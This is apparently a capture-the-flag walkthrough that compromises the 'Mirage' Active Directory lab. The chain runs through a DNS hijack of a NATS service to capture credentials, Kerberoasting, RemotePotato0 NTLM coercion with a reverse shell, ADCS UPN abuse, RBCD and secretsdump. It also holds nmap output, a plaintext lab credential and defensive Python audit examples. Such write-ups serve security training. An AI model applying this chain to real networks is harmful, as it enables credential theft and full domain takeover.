└─$ nmap -sS -p- --min-rate 10000 10.129.248.59 -Pn -oA nmap_ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 17:08 IST
Warning: 10.129.248.59 giving up on port because retransmission cap hit (10).
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.129.248.59
Host is up (0.66s latency).
Not shown: 35568 closed tcp ports (reset), 29941 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
2049/tcp  open  nfs
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
4222/tcp  open  vrml-multi-use
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
50586/tcp open  unknown
56754/tcp open  unknown
56768/tcp open  unknown
64708/tcp open  unknown
64717/tcp open  unknown
64733/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 79.77 seconds
Port 2049
Let’s see the mount
Foothold / shell
Shell as nathan.aadam
Mounting the share
We can see a MirageReports share available for everyone. Let's mount it and take a look inside.
We can see two PDFs.
Analysing PDF
Let's first take a look at the Incident Report Missing DNS Record nats-svc
On May 3, 2025, the Development team reported they were unable to resolve the hostname nats-svc.mirage.htb. This hostname is critical for internal service communication with the NATS messaging system hosted on the Mirage domain.
Another interesting finding in this report is that Dynamic Updates for the mirage.htb zone are set to "Nonsecure and secure", which means we should be able to make DNS changes without any authentication.
Next, let's take a look at the Mirage Authentication Hardening Report.
This report outlines the phased deprecation of NTLM authentication within the Mirage Active Directory environment. NTLM is a legacy authentication protocol that lacks modern security features and is vulnerable to several attacks, including credential relaying and pass-the-hash. To align with current security best practices, Mirage is moving toward a Kerberos-only authentication model. The transition is designed to be gradual and well-monitored to avoid service disruption and ensure all systems are compliant.
Hijacking nats-svc.mirage.htb via Dynamic DNS Update
What is NATS?
NATS (pronounced "gnats") is a high-performance messaging system: a message broker that lets different services communicate via publish-subscribe messaging.
Key concepts
Concept: Meaning
Client: An app or service that connects to NATS to send or receive messages.
Server: The central broker that routes all messages.
Subject: A topic string, like "alerts.critical" or "users.login".
Publish: A client sends a message to a subject.
Subscribe: A client listens for messages on a subject (like a channel).
JetStream: NATS's persistent storage feature, something like a message queue with history, replay, etc.
Think of NATS like a lightweight, turbo-fast post office inside a network:
Apps "drop" letters into named mailboxes (subjects)
Other apps are "subscribed" to those mailboxes and receive the letters in real time
NATS ensures delivery happens quickly and efficiently
With JetStream, NATS can even store the letters for later
EXPLOIT
We are going to exploit a misconfigured DNS server that allows nonsecure dynamic updates for the mirage.htb zone. This lets us hijack the hostname nats-svc.mirage.htb and point it at our machine, where we run a fake NATS server.
As a result, an internal service connects to our fake NATS server and sends its credentials in a CONNECT message.
But before that we need the real server's server_id, server_name, version, etc. (visible in the INFO banner that port 4222 returns), so that our fake banner looks like the genuine one.
We started a listener on port 4222 (default NATS port):
This sends a fake INFO banner (expected by NATS clients).
We're using Netcat (nc) to passively accept connections and reply.
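To make explicit what a NATS client and server exchange at this point, and which INFO fields decide whether credentials are exposed, here is an added Python example; it is not code from the original writeup. It parses NATS INFO and CONNECT control lines, flags an INFO banner that demands authentication without requiring TLS (the condition under which a client that trusts DNS to find its server will hand its CONNECT credentials in cleartext to whatever host answers), and redacts secret fields from a CONNECT payload before it is logged. The INFO sample is constructed with placeholder identifiers in the field layout the scan returned; the CONNECT sample and its credentials are invented.

```python
import json
import re

# Constructed samples (not captured from the page). The INFO banner carries the
# same field names the real server sent; identifiers and credentials are placeholders.
SAMPLE_INFO = (
    'INFO {"server_id":"SERVER_ID_PLACEHOLDER","server_name":"SERVER_ID_PLACEHOLDER",'
    '"version":"2.11.3","proto":1,"host":"0.0.0.0","port":4222,"headers":true,'
    '"auth_required":true,"max_payload":1048576,"jetstream":true}\r\n'
)
SAMPLE_CONNECT = (
    'CONNECT {"verbose":false,"pedantic":false,"user":"svc_placeholder",'
    '"pass":"Pass_placeholder","lang":"go","version":"1.0.0","protocol":1}\r\n'
)

# A control line is the operation name, whitespace, a JSON object, then CRLF.
_CONTROL_LINE = re.compile(r"^(INFO|CONNECT)\s+(\{.*\})$")

def parse_control_line(line):
    """Return (operation, payload dict) for an INFO or CONNECT line, or raise ValueError."""
    match = _CONTROL_LINE.match(line.strip())
    if match is None:
        raise ValueError("not an INFO/CONNECT control line")
    return match.group(1), json.loads(match.group(2))

def audit_info(info):
    """Findings about an INFO banner that bear on credential exposure.

    A client that sees no tls_required sends its CONNECT (user/pass, token or
    JWT) in cleartext to whichever host the name resolved to, so a hijacked
    DNS record is enough to harvest it.
    """
    findings = []
    tls_required = info.get("tls_required", False)
    if info.get("auth_required") and not tls_required:
        findings.append("auth_required without tls_required: CONNECT credentials travel in cleartext")
    if not tls_required and not info.get("tls_available", False):
        findings.append("no TLS offered: clients cannot verify they reached the real server")
    if info.get("host") == "0.0.0.0":
        findings.append("bound to all interfaces")
    return findings

# CONNECT fields that carry authentication material and must not reach logs.
SECRET_FIELDS = ("pass", "auth_token", "jwt", "sig", "nkey")

def redact_connect(connect):
    """Copy of a CONNECT payload with secret fields masked."""
    redacted = dict(connect)
    for field in SECRET_FIELDS:
        if field in redacted:
            redacted[field] = "<redacted>"
    return redacted

if __name__ == "__main__":
    op, info = parse_control_line(SAMPLE_INFO)
    print(op, audit_info(info))
    op, connect = parse_control_line(SAMPLE_CONNECT)
    print(op, redact_connect(connect))
```

The audit is the check to run against a production NATS deployment: the INFO banner in the scan above advertises auth_required without tls_required, which is exactly the posture that makes the DNS hijack in this writeup pay off.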
Hijack nats-svc.mirage.htb via Dynamic DNS
This sends a DNS dynamic update, making nats-svc.mirage.htb resolve to our IP (10.10.16.7) instead of the real NATS server.
⚠️ Requires that the DNS server allows "nonsecure and secure" dynamic updates (as stated in the incident report).
After a short wait, we received this on our listener:
Now we have the Dev_account_A credentials.
AD Access
Attempting to use these credentials against the AD environment doesn't grant authentication. Since they came from NATS, let's try to authenticate to NATS with them instead.
We will use the nats CLI to connect to the NATS server as Dev_account_A.
Let's take a look at our streams
Let’s take a look at the auth_logs
We have a new set of credentials! david.jjackson:pN8kQmn6b86!1234@
Let's check if we're able to authenticate to AD through ldap.
We need a Kerberos ticket to authenticate (see the kinit session below).
Bloodhound
Since we have valid credentials we can use bloodhound-python.
Among the findings: NATHAN.AADAM@MIRAGE.HTB -> MemberOf -> IT_ADMINS@MIRAGE.HTB
Kerberoasting
NATHAN.AADAM@MIRAGE.HTB has its SPN set to HTTP/exchange.mirage.htb.
Therefore, we can try a Kerberoasting attack.
We got the hash; we can try to crack it with hashcat.
Now we have Nathan's credentials,
and we have user.txt.
Privilege Escalation
Authenticate as Mark.Bbond
First, we need to upgrade our evil-winrm session to an interactive session. This way, we'll obtain more enumeration capabilities:
We can see in our groups that we are now in NT AUTHORITY\INTERACTIVE, which grants more enumeration capabilities. Let's see if another account is connected to the box:
We can see mark.bbond is connected to the box with session ID 1. We can use a universal, unpatched technique for retrieving this user's NTLMv2 response, RemotePotato0.exe:
Now that we have mark.bbond's hash, we can crack it with hashcat.
Why this worked (ChatGPT)
This was privilege escalation via NTLM relay using RemotePotato0, targeting a user who is actively logged in to the system (mark.bbond). Here's why it worked and how the pieces fit together technically:
Why This Worked: High-Level Overview
We exploited the COM infrastructure and NTLM authentication behavior of Windows to force an already-logged-in privileged user (mark.bbond) to authenticate to a fake RPC server we controlled — and then captured the NTLMv2 response.
This is possible because:
We had enough local privileges (as nathan.aadam) to spawn a COM object in another user’s session.
That COM object used NTLM authentication when connecting to resources.
We redirected RPC traffic (port 135) using socat, so authentication flowed to our fake listener, not the real one.
RemotePotato0 relayed the authentication to our listener and captured the NTLMv2 hash.
Detailed Breakdown: Step-by-Step
We got a better shell via runasc.exe
We used runasc.exe to impersonate user nathan.aadam interactively:
This opened a new interactive PowerShell reverse shell to our attacker box (10.10.16.11:1234).
The new shell had NT AUTHORITY\INTERACTIVE, allowing access to more desktop and session-related features (like COM object spawning into other sessions).
We found a privileged user logged in
Using qwinsta:
We saw:
Meaning mark.bbond is actively logged in with session ID 1. This is crucial: RemotePotato0 needs a target user session to spawn a COM object into.
We ran RemotePotato0 to force NTLM authentication
This:
Uses mode 2 (DCOM-based coercion)
Uses server mode 1 (our fake RPC/HTTP relay server)
Sends NTLM authentication to our attack box (-x 10.10.16.11)
We used socat to forward port 135 to our fake RPC listener
On our attacker box:
This:
Listens on port 135 locally
Redirects any DCOM traffic to port 9999 on the target box (our victim)
Enables RemotePotato0 to intercept and handle RPC/COM calls (ResolveOxid2)
RemotePotato0 impersonated mark.bbond using COM
It:
Used StandardGetInstanceFromIStorage to spawn a COM object inside session 1 (mark.bbond)
That object tried to authenticate via NTLM to a remote resource: our listener on port 135 (which socat forwards to port 9999 on the target box)
We captured the NTLMv2 challenge-response hash
We saw:
How It Works Technically (RPC + COM + NTLM)
COM Activation: Windows allows you to activate COM objects in other user sessions under certain conditions (like being interactive).
NTLM Authentication: When the COM object is initialized, it may attempt to authenticate over RPC using the context of the user it runs as (mark.bbond).
ResolveOxid2 Call: This call is made over DCOM (port 135), and authentication occurs via NTLM challenge-response.
NTLM Relay: We redirected this call to a controlled service that captured the NTLMv2 hash, a credential we can now crack or relay.
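The captured line is more than a crackable hash: the hex blob at its end is the NTLMv2_CLIENT_CHALLENGE structure, and the AV pairs inside it tell a defender which relay protections were or were not in play for this authentication. The following Python example is added here and is not code from the writeup or from RemotePotato0; it parses a hashcat-format NTLMv2 line according to the public NTLM specification (MS-NLMP), decodes the target info, and reports the MIC flag, channel bindings and target SPN. The sample input is the response captured above, split along its structure for readability.

```python
import struct
from datetime import datetime, timedelta, timezone

# The NTLMv2 response captured above (hashcat format:
# user::domain:server_challenge:ntproofstr:blob). Only the blob is split up,
# along its structure, so the fields are visible.
BLOB_HEX = "".join([
    "0101000000000000",                  # RespType, HiRespType, reserved
    "a11d07624bfbdb01",                  # TimeStamp (FILETIME, little-endian)
    "f23c6dc177960691",                  # ChallengeFromClient
    "00000000",                          # reserved
    "02000c004d0049005200410047004500",  # MsvAvNbDomainName
    "010008004400430030003100",          # MsvAvNbComputerName
    "040014006d00690072006100670065002e00680074006200",  # MsvAvDnsDomainName
    "03001e0064006300300031002e006d00690072006100670065002e00680074006200",  # MsvAvDnsComputerName
    "050014006d00690072006100670065002e00680074006200",  # MsvAvDnsTreeName
    "07000800a11d07624bfbdb01",          # MsvAvTimestamp
    "0600040006000000",                  # MsvAvFlags
    "0800300030000000000000000100000000200000"
    "e217b7bc8776c4fa1a8b008d2ee9e05697e814c38c252fa149b54d0c553451b9",  # MsvAvSingleHost
    "0a001000" + "00" * 16,              # MsvAvChannelBindings (all zero)
    "09000000",                          # MsvAvTargetName (empty)
    "00000000",                          # MsvAvEOL
    "00000000",                          # reserved
])
CAPTURED_LINE = "mark.bbond::MIRAGE:7013e4ac202a8922:26ca9686e9654d2f934fc9cfe36214ee:" + BLOB_HEX

AV_NAMES = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
            4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags",
            7: "MsvAvTimestamp", 8: "MsvAvSingleHost", 9: "MsvAvTargetName",
            10: "MsvAvChannelBindings"}

def filetime_to_datetime(filetime):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)

def parse_av_pairs(blob, offset):
    """Decode an AV_PAIR list (MS-NLMP 2.2.2.1): AvId(2) AvLen(2) Value, until MsvAvEOL."""
    pairs = {}
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, offset)
        value = blob[offset + 4:offset + 4 + av_len]
        offset += 4 + av_len
        if av_id == 0:
            return pairs
        pairs[AV_NAMES.get(av_id, "AvId%d" % av_id)] = value

def parse_ntlmv2_line(line):
    """Parse a hashcat-format NTLMv2 line into its protocol fields."""
    user, _, domain, server_challenge, ntproofstr, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE (MS-NLMP 2.2.2.7): RespType(1) HiRespType(1) Reserved1(2)
    # Reserved2(4) TimeStamp(8) ChallengeFromClient(8) Reserved3(4) AvPairs Reserved4(4)
    return {
        "user": user,
        "domain": domain,
        "server_challenge": bytes.fromhex(server_challenge),
        "ntproofstr": bytes.fromhex(ntproofstr),
        "resp_type": (blob[0], blob[1]),
        "timestamp": filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0]),
        "client_challenge": blob[16:24],
        "av_pairs": parse_av_pairs(blob, 28),
    }

def relay_posture(parsed):
    """What the target info says about the protections a relay target could rely on."""
    av = parsed["av_pairs"]
    text = lambda name: av[name].decode("utf-16-le") if name in av else None
    flags = struct.unpack("<I", av["MsvAvFlags"])[0] if "MsvAvFlags" in av else 0
    bindings = av.get("MsvAvChannelBindings", b"")
    return {
        "target_netbios_domain": text("MsvAvNbDomainName"),
        "target_computer": text("MsvAvDnsComputerName"),
        "mic_present": bool(flags & 0x2),             # AUTHENTICATE message carries a MIC
        "spn_from_untrusted_source": bool(flags & 0x4),
        "channel_bindings_present": any(bindings),    # all-zero means no EPA/CBT
        "target_spn": text("MsvAvTargetName") or "",  # empty: nothing for a service to validate
    }
```

For this capture the posture is the interesting part: the timestamp dates the coercion, channel bindings are all zero and the target SPN is empty, so a service that does not require Extended Protection or SPN validation would accept a relay of it; only the MIC flag is set, which protects the message against tampering but not against relay. A client that set MsvAvTargetName and real channel bindings would be far less useful to an attacker, and that is the hardening lever on the defending side.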
The account is locked out due to too many login attempts.
The account is expired or otherwise marked as invalid for Kerberos login.
Let's check if the account is disabled or not
Let’s remove this property
Still getting KDC_ERR_CLIENT_REVOKED
If logonHours is set and you're trying to authenticate outside the permitted window, Kerberos and NTLM authentication will fail, potentially with the error:
❌ KDC_ERR_CLIENT_REVOKED
Even though the user’s password is correct and the account is active.
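Because logonHours is a packed bitmask, it is easy to misread when chasing KDC_ERR_CLIENT_REVOKED. The added Python example below is mine, not code from the writeup or from bloodyAD; it decodes the attribute, answers whether a logon is allowed at a given moment, expands the mask into a per-day table for review, and classifies the three states that matter (attribute absent, all zero, present but outside the window). The bit layout follows Microsoft's documentation of the attribute (21 bytes, one bit per hour of the week starting Sunday 00:00 UTC, least significant bit first); that layout and the "absent means unrestricted" rule are the assumptions the code relies on, and the masks used are constructed test data.

```python
from datetime import datetime, timezone

DAY_NAMES = ("Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat")

def _bit_index(day, hour):
    """Week-hour number: day 0 = Sunday, hours counted in UTC."""
    return day * 24 + hour

def logon_allowed(logon_hours, when):
    """True if logonHours permits a logon at `when` (an aware datetime).

    Layout assumed here, following Microsoft's documentation of the attribute:
    21 bytes = 168 bits, one per hour of the week, starting Sunday 00:00 UTC,
    least significant bit of each byte first. A missing or empty attribute
    means no restriction; an all-zero value means the account can never log on.
    """
    if not logon_hours:
        return True
    if len(logon_hours) != 21:
        raise ValueError("logonHours must be 21 bytes, got %d" % len(logon_hours))
    utc = when.astimezone(timezone.utc)
    day = (utc.weekday() + 1) % 7        # Python Monday=0 -> Sunday=0 here
    index = _bit_index(day, utc.hour)
    return bool((logon_hours[index // 8] >> (index % 8)) & 1)

def allowed_hours_by_day(logon_hours):
    """Expand the mask into {day name: [permitted UTC hours]} for review."""
    if not logon_hours:
        return {name: list(range(24)) for name in DAY_NAMES}
    table = {}
    for day, name in enumerate(DAY_NAMES):
        table[name] = [hour for hour in range(24)
                       if (logon_hours[_bit_index(day, hour) // 8]
                           >> (_bit_index(day, hour) % 8)) & 1]
    return table

def build_logon_hours(permitted):
    """Build a 21-byte mask from (day, hour) pairs; used here to construct test data."""
    mask = bytearray(21)
    for day, hour in permitted:
        index = _bit_index(day, hour)
        mask[index // 8] |= 1 << (index % 8)
    return bytes(mask)

def explain_logon_hours(logon_hours, when):
    """Classify the attribute the way you would when triaging KDC_ERR_CLIENT_REVOKED."""
    if not logon_hours:
        return "logonHours absent: no hour restriction"
    if not any(logon_hours):
        return "logonHours all zero: account can never log on"
    if logon_allowed(logon_hours, when):
        return "logon permitted at this hour"
    return "outside permitted logon hours (the mask is in UTC, not local time)"

if __name__ == "__main__":
    # Constructed example: office hours on Monday 09-10 UTC and Friday 17 UTC only.
    mask = build_logon_hours([(1, 9), (1, 10), (5, 17)])
    print(allowed_hours_by_day(mask))
    print(explain_logon_hours(mask, datetime(2025, 7, 21, 9, 30, tzinfo=timezone.utc)))
```

The UTC point is the usual trap: the GUI shows the mask in the admin's local time, so an account that looks unrestricted in the console can still be revoked at the KDC for a client in another zone, and a defender reviewing a change like the one made above should diff the raw 21 bytes rather than the rendered grid.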
This means the logonHours attribute is empty, which in Active Directory means:
Step 1: Read the initial UPN of the victim account (Optional - for restoration).
Step 2: Update the victim account's UPN to the target DC's sAMAccountName (suffixed with the domain). The target is the DC's machine account, DC01$. We set the victim's UPN to dc01$@mirage.htb.
Step 3: Obtain credentials for the "victim" account (if not already known) and set up a Kerberos ccache. Set the Kerberos credential cache environment variable (shell command):
Step 4: Request a client authentication certificate as the "victim" user. The certificate will be legitimately issued to the victim account (and its SID will be embedded if the template includes the SID security extension), but the UPN in its SAN will be the manipulated dc01$@mirage.htb.
Step 5: Revert the "victim" account's UPN to its original value (remember to authenticate as MIRAGE-SERVICE$ before doing so).
Step 6: Authenticate to LDAPS (Schannel) as the target DC using the certificate. Certipy's auth command with the -ldap-shell option will attempt to connect to the DC's LDAPS port (636) using the provided certificate for Schannel client authentication.
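Why the DC accepts a certificate whose SAN UPN says dc01$ while its SID extension says otherwise comes down to how the KDC maps a certificate to an account. The Python example below is added here and is not code from the writeup or from Certipy; it models the two mappings involved: implicit UPN matching, which falls back to sAMAccountName@domain for accounts that have no userPrincipalName (machine accounts), and the strong-mapping check that compares the certificate's SID extension with the account the UPN resolved to. The directory snapshot is constructed from the names and SIDs shown in the output above, the lookup functions stand in for LDAP queries, and the behaviour of full enforcement is my reading of Microsoft's strong certificate mapping rules.

```python
# Constructed directory snapshot: names and SIDs as shown in the certipy output
# above; the dict stands in for an LDAP lookup.
DOMAIN_DNS = "mirage.htb"
DIRECTORY = {
    "DC01$": {"sid": "S-1-5-21-2127163471-3824721834-2568365109-1000",
              "userPrincipalName": None},
    "javier.mmarshall": {"sid": "S-1-5-21-2127163471-3824721834-2568365109-1109",
                         "userPrincipalName": "javier.mmarshall@mirage.htb"},
    "Mirage-Service$": {"sid": "S-1-5-21-2127163471-3824721834-2568365109-1112",
                        "userPrincipalName": None},
}

def account_for_upn(upn, directory, domain_dns):
    """Implicit UPN mapping: an explicit userPrincipalName match first, then
    '<sAMAccountName>@<domain DNS name>' for accounts that have no UPN set.
    The fallback is what lets 'dc01$@mirage.htb' land on the DC's machine account."""
    user, _, domain = upn.partition("@")
    for name, attrs in directory.items():
        if attrs["userPrincipalName"] and attrs["userPrincipalName"].lower() == upn.lower():
            return name
    if domain.lower() == domain_dns.lower():
        for name in directory:
            if name.lower() == user.lower():
                return name
    return None

def map_certificate(san_upn, cert_sid, directory, domain_dns, full_enforcement=True):
    """Return (account, reason). Under full enforcement the SID carried in the
    certificate's szOID_NTDS_CA_SECURITY_EXT extension must equal the SID of the
    account the UPN resolved to; that mismatch is the detectable artefact of the
    UPN manipulation described above."""
    account = account_for_upn(san_upn, directory, domain_dns)
    if account is None:
        return None, "no account matches UPN %s" % san_upn
    if full_enforcement:
        if cert_sid is None:
            return None, "certificate has no SID extension; full enforcement rejects it"
        if directory[account]["sid"] != cert_sid:
            return None, "SID %s in certificate does not belong to %s" % (cert_sid, account)
    return account, "mapped"

if __name__ == "__main__":
    issued_to_victim = DIRECTORY["javier.mmarshall"]["sid"]
    print(map_certificate("dc01$@mirage.htb", issued_to_victim, DIRECTORY, DOMAIN_DNS,
                          full_enforcement=False))
    print(map_certificate("dc01$@mirage.htb", issued_to_victim, DIRECTORY, DOMAIN_DNS))
```

The certipy output above already shows the mismatch (SAN UPN dc01$@mirage.htb, security extension SID ending in -1109, which belongs to the victim user), so a CA or DC log review that compares the two fields on every client-authentication certificate catches this class of abuse without needing to see the UPN change itself.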
RBCD
We have LDAP access as DC01$, so let's configure resource-based constrained delegation on DC01$ so that our service account, Mirage-Service$, can impersonate users to it.
We will use ldap-shell
Secretsdump
Now we will use S4U2Self to impersonate Administrator
This generates a service ticket to cifs/dc01.mirage.htb for Administrator, usable by Mirage-Service$.
Now we can secretsdump
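What set_rbcd actually writes is a security descriptor into msDS-AllowedToActOnBehalfOfOtherIdentity on DC01$, and reading that attribute back is how a defender finds this. The following Python example is added here and is not code from the writeup or from impacket: it builds a self-relative SECURITY_DESCRIPTOR with one ACCESS_ALLOWED ACE per grantee purely to construct test data, then parses such a descriptor back into the granted SIDs and audits a set of computer accounts for delegation grants. The SIDs are the ones shown in the ldap-shell output above; the list of computers and the owner SID are constructed.

```python
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FULL_CONTROL = 0x000F01FF

def sid_to_bytes(sid):
    """'S-1-5-21-...' to the binary SID layout: Revision, SubAuthorityCount,
    6-byte big-endian IdentifierAuthority, little-endian sub-authorities."""
    parts = sid.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def sid_from_bytes(buf, offset):
    """Inverse of sid_to_bytes; returns (sid string, bytes consumed)."""
    revision, count = buf[offset], buf[offset + 1]
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, offset + 8)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs)), 8 + 4 * count

def build_rbcd_descriptor(grantee_sids):
    """Self-relative SECURITY_DESCRIPTOR whose DACL grants each SID full control,
    the shape written into msDS-AllowedToActOnBehalfOfOtherIdentity.
    Used here only to construct test data."""
    aces = b""
    for sid in grantee_sids:
        sid_bytes = sid_to_bytes(sid)
        # ACE_HEADER (type, flags, size) + ACCESS_MASK + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), FULL_CONTROL) + sid_bytes
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(grantee_sids), 0) + aces
    owner = sid_to_bytes("S-1-5-32-544")  # BUILTIN\Administrators as owner and group (constructed)
    header_len = 20
    # SD header: Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         header_len + len(dacl), header_len + len(dacl), 0, header_len)
    return header + dacl + owner

def allowed_to_act_sids(descriptor):
    """SIDs granted by ACCESS_ALLOWED ACEs in the DACL of a self-relative descriptor."""
    revision, _, control, _, _, _, dacl_offset = struct.unpack_from("<BBHIIII", descriptor, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or dacl_offset == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", descriptor, dacl_offset)
    position = dacl_offset + 8
    granted = []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", descriptor, position)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            granted.append(sid_from_bytes(descriptor, position + 8)[0])
        position += ace_size
    return granted

def audit_rbcd(computers, sid_names):
    """computers: {sAMAccountName: descriptor bytes or None}; sid_names: {SID: name}.
    Any non-empty grant on a domain controller is a finding worth a ticket."""
    findings = []
    for computer, descriptor in computers.items():
        for sid in (allowed_to_act_sids(descriptor) if descriptor else []):
            findings.append("%s allows %s (%s) to impersonate users to it via S4U2Proxy"
                            % (computer, sid_names.get(sid, "unknown principal"), sid))
    return findings

if __name__ == "__main__":
    svc = "S-1-5-21-2127163471-3824721834-2568365109-1112"
    computers = {"DC01$": build_rbcd_descriptor([svc]), "WS01$": None}
    print(audit_rbcd(computers, {svc: "Mirage-Service$"}))
```

In a real audit the descriptor bytes come straight from LDAP (the attribute is returned as an octet string), so the parser is the only part that changes between the test data here and production, and the rule stays the same: a domain controller's computer object should carry no such grant at all.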
We can obtain a shell as Administrator with the NT hash:
└─$ nmap -sC -sV -p 53,88,111,135,139,389,445,464,593,636,2049,3268,3269,4222,5985,9389,47001,49666,49667,49669,50586,56754,56768,64708,64717,64733 10.129.248.59 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 17:22 IST
Nmap scan report for 10.129.248.59
Host is up (0.41s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-21 18:52:15Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
4222/tcp open vrml-multi-use?
| fingerprint-strings:
| GenericLines:
| INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":734,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
| -ERR 'Authorization Violation'
| GetRequest:
| INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":735,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
| -ERR 'Authorization Violation'
| HTTPOptions:
